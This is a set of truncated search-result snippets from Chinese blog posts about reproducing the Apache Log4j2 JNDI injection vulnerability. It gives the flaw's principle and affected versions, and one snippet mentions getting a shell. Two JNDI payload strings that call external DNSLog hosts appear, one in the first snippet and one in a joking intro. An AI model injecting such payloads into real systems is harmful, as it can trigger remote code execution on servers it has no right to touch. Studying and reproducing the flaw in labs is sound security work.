二、漏洞復現 2.1 使用DNLOG平台查看回顯 可以使用相關的dnslog平台查看，也可以使用burp自帶的dnslog進行查看，我這里使用的是 http://dnslog.cn/ ${jndi:ldap://rbmanr.dnslog.cn/exp} 有回顯，說明存在該漏洞 ...

今天突然想碼字，那就寫一下log4j。 一、漏洞簡介 1.漏洞原理 Apache Log4j2 中存在JNDI注入漏洞，當程序將用戶輸入的數據進行日志記錄時，即可觸發此漏洞，成功利用此漏洞可以在目標服務器上執行任意代碼。 通俗簡單的說就是：在打印日志的時候，如果你的日志內容中包含 ...

參考鏈接 https://www.cnblogs.com/xuzhujack/p/15673703.html https://blog.csdn.net/weixin_44309905/artic ...

第一條，心中無女人，挖洞自然神。 白帽守則第一頁第二條，只有不努力的白帽，沒有挖不到的漏洞 對此我深表 ...

本次記錄自己測試時每一步操作，很詳細。 本次復現分為curl測試和拿shell兩種操作，測試完curl后體驗時長到期了，只能換環境了。 本次測試環境如下： curl------------------------------------------------------ 靶場 ...

0X00-引言 過年了，放炮 這個漏洞真牛逼，日天，日地，日空氣 2021年12月10日凌晨，我正坐在馬桶上，突然看到廁紙上面出現一串神秘代碼${jndi:ldap://kao5b1ig.ns.dns3.cf.} ,我趕緊起身，打開電腦一看，網頁dnslog彈出記錄，我大驚，緊接 ...

前景：昨天被一則新聞刷屏 　　當看到這個消息的時候，公司也啟動緊急響應，要求來檢查目前生產中使用的log4j版本是否有這個問題，根據火線官方說明，但凡是版本在 2.x <= 2.15.0-rc1，都會有這個漏洞，一看到這個，我就知道基本全覆蓋了，果然一看服務器上的組件 ...

概念 RMI（Remote Method Invocation） 即Java遠程方法調用，一種用於實現遠程過程調用的應用程序編程接口 JNDI (Java Naming and Directory ...